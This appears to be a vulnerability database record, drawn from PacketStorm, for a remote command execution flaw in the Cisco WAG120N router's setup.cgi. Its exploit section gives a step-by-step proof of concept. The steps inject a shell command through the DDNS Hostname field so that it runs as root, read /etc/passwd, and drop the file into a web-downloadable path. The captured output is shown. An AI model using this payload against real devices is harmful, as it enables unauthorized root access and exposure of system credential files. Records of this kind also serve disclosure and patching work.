ID

VAR-E-201211-0596


TITLE

Cisco WAG120N Command Execution

Trust: 0.5

sources: PACKETSTORM: 118320

DESCRIPTION

Cisco WAG120N suffers from a remote command execution vulnerability in setup.cgi.

Trust: 0.5

sources: PACKETSTORM: 118320

AFFECTED PRODUCTS

vendor:ciscomodel:wag120nscope: - version: -

Trust: 0.5

sources: PACKETSTORM: 118320

EXPLOIT

Hello, here you have a quick POC in three simple steps

# Remote Command Execution on Cisco WAG120N.
# (Not tested in other routers)
#
# Manuel Fern\xe1ndez Fern\xe1ndez (thesur@itsm3.com)
#
# Greetings to 2x1 crew (Alberto, Dani, Luis, Juanmi, Juanito & oca)

1\xba Authenticate and browse to /setup.cgi?next_file=Setup_DDNS.htm
2\xba All the fields you see are vulnerables to command execution as root, so
inject "qwe.com;cat /etc/passwd> /www/Routercfg.cfg;" into the Hostname
field
3\xba Everything is done, just download the file /Routercfg.cfg (Authenticated
is requiered)

root::0:0:root:/:/bin/sh
nobody::99:99:Nobody:/:/sbin/sh

--
Manuel Fern\xe1ndez

Trust: 0.5

sources: PACKETSTORM: 118320

EXPLOIT HASH

LOCAL

SOURCE

md5: e7c1f4d8e514ad1411426380181ab2f8
sha-1: eff11e1351e0afcb0f089b9940b5a00afced2a49
sha-256: 3f3738e0fe87c901ce923fe505448e7d8a980e7ffb970f817472dc722f51bd86
md5: e7c1f4d8e514ad1411426380181ab2f8

Trust: 0.5

sources: PACKETSTORM: 118320

PRICE

free

Trust: 0.5

sources: PACKETSTORM: 118320

TAGS

tag:exploit

Trust: 0.5

tag:remote

Trust: 0.5

tag:cgi

Trust: 0.5

sources: PACKETSTORM: 118320

CREDITS

Manu

Trust: 0.5

sources: PACKETSTORM: 118320

EXTERNAL IDS

db:PACKETSTORMid:118320

Trust: 0.5

sources: PACKETSTORM: 118320

SOURCES

db:PACKETSTORMid:118320

LAST UPDATE DATE

2022-07-27T09:32:57.334000+00:00


SOURCES RELEASE DATE

db:PACKETSTORMid:118320date:2012-11-23T17:05:54